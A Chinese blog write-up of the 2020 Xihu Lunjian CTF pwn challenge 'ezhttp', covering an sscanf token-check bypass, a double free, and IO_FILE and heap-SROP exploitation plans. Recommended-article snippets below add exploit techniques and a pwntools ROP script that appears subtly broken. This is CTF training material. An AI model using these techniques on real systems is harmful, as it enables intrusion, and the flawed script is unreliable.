2020 西湖论剑 pwn ezhttp

最新推荐文章于 2024-05-22 09:49:29 发布
原创 最新推荐文章于 2024-05-22 09:49:29 发布 · 501 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了一种利用C库函数sscanf存在的漏洞的方法,通过构造特定payload绕过cookie验证并触发双释放(double free)漏洞。文章详细分析了如何使token等于空字节以绕过检查,并在开启了沙箱的环境中实现堆栈上的返回导向编程(SROP)。

在这里插入图片描述
保护。

在这里插入图片描述
开了沙箱。

在这里插入图片描述
往这个haystack地方读入随机数。

在这里插入图片描述然后是程序的主体部分。
首先书输入用来ssanf函数

C 库函数 int sscanf(const char *str, const char format, …) 从字符串读取格式化输入。
str – 这是 C 字符串,是函数检索数据的源。
format – 这是 C 字符串,包含了以下各项中的一个或多个:空格字符、非空格字符 和 format 说明符。
format 说明符形式为 [=%[][width][modifiers]type=]

所以我们根据逻辑很容易得到payload的格式。
在这里插入图片描述首先s第一个单词是get或者post,第二个单词用于后面的命令。

然后后面要跟cookie。cookie最后接上命令的内容。

我们现在的问题是要cookie验证成功。
在这里插入图片描述首先先拿出来了cookie跟token。
cookie后面要跟user=admin。
中间还用了一个sscnaf,后面的格式化字符串是一个正则表达式。

token后面要跟上我们的输入。
当他是空字节的时候,会发生什么我们做了个实验。

在这里插入图片描述
看得出来显然空字节直接就会过检查。这就是漏洞点了。
我们token直接等于空字节就可以绕过对token的检查。

那怎么让他是空字节

我们跟踪一次执行流程。

在这里插入图片描述刚输入的时候是没有这个空字节的。

在这里插入图片描述
然后在这个地方截断了。就会多个空字节出来。

在这里插入图片描述

然后去分析功能。

在这里插入图片描述
del函数里面有double free。

剩下的利用就是我们的常规利用了。
因为申请的chunk不能大于0x100,所以我们可以申请多一点的chunk,也可以直接攻击tcache struct。
因为没有show,所以我们需要攻击IO_FILE
因为开了沙箱,所以需要做一个堆的SROP。

2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 830
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 689
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
Linux一键配置工具ezhttp介绍
chukouhun7323的博客
02-22 218
简介 ezhttp是一个Linux一键配置工具,采用bash脚本语言编写。支持自动配置LAMP,LNMP,LNAMP环境,以前提供各种其它的配置工具,如自动配置swap,配置iptables等。项目托管在github,地址为https://github.com/centos-bz/ezhttp...
centos ezhttp mysql,Linux一键配置工具ezhttp介绍
weixin_29062613的博客
03-18 161
简介ezhttp是一个Linux一键配置工具,采用bash脚本语言编写。支持自动配置LAMP,LNMP,LNAMP环境,以前提供各种其它的配置工具,如自动配置swap,配置iptables等。项目托管在github,地址为https://github.com/centos-bz/ezhttp。支持的系统理论上支持所有Linux系统,但推荐的系统有centos、ubuntu、debian。功能支持的...
EZHTTP(一键安装Nginx Apache PHP MySQL Memcached Pureftpd)安装【测试ing】
耕耘——从菜鸟到高手的蜕变
05-01 1104
EZHTTP(一键安装Nginx Apache PHP MySQL Memcached Pureftpd)安装 [复制链接]     梁国平 电梯直达 楼主 发表于 2014-2-11 22:21:06|只看该作者 本帖最后由 梁国平 于 2014-2-11 22
推荐开源神器:ezhttp,一键安装Web服务器集群的利器!
gitblog_00040的博客
05-22 377
推荐开源神器:ezhttp,一键安装Web服务器集群的利器! 1、项目介绍 ezhttp 是一个强大的bash脚本工具,旨在简化Apache、Nginx、PHP和MySQL等网络服务的安装过程。只需简单几步操作,即可在多种Linux发行版上轻松搭建起你的服务器环境。无论你是新手还是老手,这个工具都将极大地提高你的工作效率。 2、项目技术分析 ezhttp 使用bash脚本来实现自动化安装流程,支持...
EZHTTP首页、文档和下载 - web服务器一键安装脚本 - 开源中国社区
weixin_34254823的博客
09-05 234
EZHTTP首页、文档和下载 - web服务器一键安装脚本 - 开源中国社区
2024西湖论剑WP(reverse_MZ)
ZJPC007的博客
02-05 887
有函数可知,根据转换得到48位的字符串并进行SHA1加密,密文为dc0562f86bec0a38508e704aa9faa347101e1fdb。因为转换过程中有多种可能,所以需要进行一些手搓的步骤,逐渐得到flag。思路大概就是先进行转换然后SHA1加密。逆向板块就做出这一题。
西湖论剑——pwn
weixin_44319142的博客
04-07 653
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
西湖论剑WriteUp By Nu1L.pdf
11-26
"西湖论剑WriteUp By Nu1L" 本文档涵盖了多个IT领域的知识点,涵盖了信息安全、密码学、编程语言和算法等领域。下面将逐一介绍这些知识点。 1. Reverse ROR(Reverse Rotate Right):从代码中可以看到,作者使用...
EZHTTP建站,Discuz建立社区流程重现
InSpirit1的专栏
06-18 1036
之前用过EZHTTP这套好用的建站gong
CTF-HTTP(持续更新)
m0_74317362的博客
07-27 2557
HTTP请求头
ACTF新生赛 EASYHTTP
SopRomeo的博客
03-17 1031
最近自闭了,找了ACTF新生赛的源码自己复现做了一下 看到下面输出了服务器对应的信息,我们将这些信息依次填上去 让我们GET,POST,注意url地址: 地址换了,放burb去上传GET,POST.(传中文需进行url编码) 发现换了个php代码,复制到proxy放行, 重新抓包 伪造ip地址即可得到flag ...
【Web】Http协议相关例题wp
uuzeray的博客
11-08 997
写点博客记录一下ctf学习,一是做题型总结,二是准备新生赛。
[GKCTF 2020]ez三剑客-eztypecho
rev1ve的博客
01-02 843
如果有GET传参finish,则进入下面代码,如果有session值,那么unserialize函数反序列化,我们跟进到Typecho_Cookie::get()我们通过POST上传PHP_SESSION_UPLOAD_PROGRESS使得将上传文件信息保存到session,上传的文件就是files。得到payload后解决如何构造session,用的是PHP中的特性PHP_SESSION_UPLOAD_PROGRESS。的赋值逻辑,如果cookie存在key参数,那么该参数值赋值给。
Geek challenge 2023 EzHttp
Welcome To Myon'Blog !
12-14 1072
访问得到的路径:/o2takuXX's_username_and_password.txt。请求头X-Forwarded-For写127.0.0.1,要求使用Syc.vip代理。请求头Referer写sycsec.com,要求使用Syclover浏览器。请求头User-Agent写Syclover,要求从localhost访问。简单审一下,要求有请求头O2TAKUXX并且内容为GiveMeFlag。增加请求头O2TAKUXX,值为GiveMeFlag。请求头Via写Syc.vip,回显php代码。
2023CNSS——WEB题解(持续更新)
m0_74317362的博客
10-18 717
进来看到按钮点击不了,想到去修改代码,要“检查“,但这里的右键和F12都不可用还好还有其他方法选用一种后进入检查页面删掉这里的disabled即可点击后得到flag。
[GKCTF 2020]ez三剑客-ezweb
m0_70819573的博客
04-16 370
是输入url的题目,基本可以判断是ssrf的题目,尝试用file伪协议读取index.php源码.发现被过滤了,尝试file:/、file:///,成功获得index.php的源码。盲猜redit默认端口6379和mysql默认端口3306,发现redit服务有回显。利用redis服务未授权访问漏洞在根目录创建shell.php。查看页面源码,发现可以进行secret传参,获得内网信息。用薄荷扫描内网c段寻找存活主机,发现提示。访问/shell.php得到flag。
XYCTF 2024 部分web wp
焦虑的焦虑
04-26 2811
XYCTF 2024 部分web wp
2025 西湖论剑 WP Pwn
最新发布
03-13
### 2025年西湖论剑WP Pwn比赛详情及相关信息 #### 比赛背景 2025年的第八届西湖论剑网络安全技能大赛中的Pwn部分,作为一项高水平的技术竞赛吸引了众多安全研究者和技术爱好者参与[^1]。该赛事主要考察选手在二进制漏洞挖掘与利用方面的技术能力。 #### 参赛队伍概况 虽然具体参赛队伍名单未完全公开,但从往届情况来看,通常由国内外知名高校的安全团队、企业内部红队以及独立白帽黑客组成。这些队伍通过预选赛晋级决赛阶段,在比赛中展示其卓越的技术实力和快速解决问题的能力[^4]。 #### 解题思路概述 以下是基于已有资料总结的一些典型Pwn题目及其解决方法: 1. **Canary泄露与栈溢出** - 题目可能设置了栈保护机制(Stack Canary),攻击者需先通过某种方式泄露Canary值。 - 利用缓冲区溢出覆盖返回地址,并结合ROP链调用`system("/bin/sh")`完成提权操作。 2. **堆风水与UAF (Use After Free)** - 堆管理错误是常见的一类漏洞形式之一。例如程序可能存在释放后重用指针或者大小计算不当等问题。 - 攻击策略包括调整内存布局使得特定数据结构被可控内容填充;进而伪造chunk header实现任意读写功能[^3]。 3. **格式化字符串漏洞** - 当输入参数未经严格校验便传递给printf系列函数时,则可能发生此类问题。 - 使用这种方法可以探知目标进程内部状态(如基址偏移量),为进一步构建payload奠定基础[^2]。 4. **Return-Oriented Programming (ROP) 技巧应用** - 对于开启了NX(non-executable stack)防护措施的目标环境来说,单纯注入shellcode难以奏效。 - 此刻就需要寻找gadgets组合起来执行所需命令序列。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') libc = elf.libc # Establish connection to service or binary locally/remote. if args.REMOTE: io = remote('challenge.example.com', 1337) else: io = process([elf.path]) # Leak canary value via format string bug. io.recvuntil(b'What is your name? ') fmt_str_payload = b'%15$p.%19$p.' io.sendline(fmt_str_payload) leaked_data = io.recvline().strip() stack_canary, libc_base_leak = map(lambda x:int(x,16), leaked_data.split(b'.')) log.info(f'Stack Canary Value:{hex(stack_canary)}') # Calculate actual addresses based on leaks. base_addr_offset = u64(libc_base_leak.ljust(8,b'\x00')) - libc.symbols['puts'] system_plt = base_addr_offset + libc.symbols['system'] pop_rdi_ret_gadget = next(elf.search(asm('pop rdi; ret'))) bin_sh_string_loc = next(elf.search(b'/bin/sh\x00')) exploit_chain = flat([ pop_rdi_ret_gadget, bin_sh_string_loc, system_plt ]) offset_to_overwrite_return_address = cyclic_find(0x61616161) # Replace with correct offset found during fuzzing phase. final_exploit_buffer = fit({ offset_to_overwrite_return_address : exploit_chain },filler=b'A'*offset_to_overwrite_return_address) io.interactive() if args.DEBUG else None ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值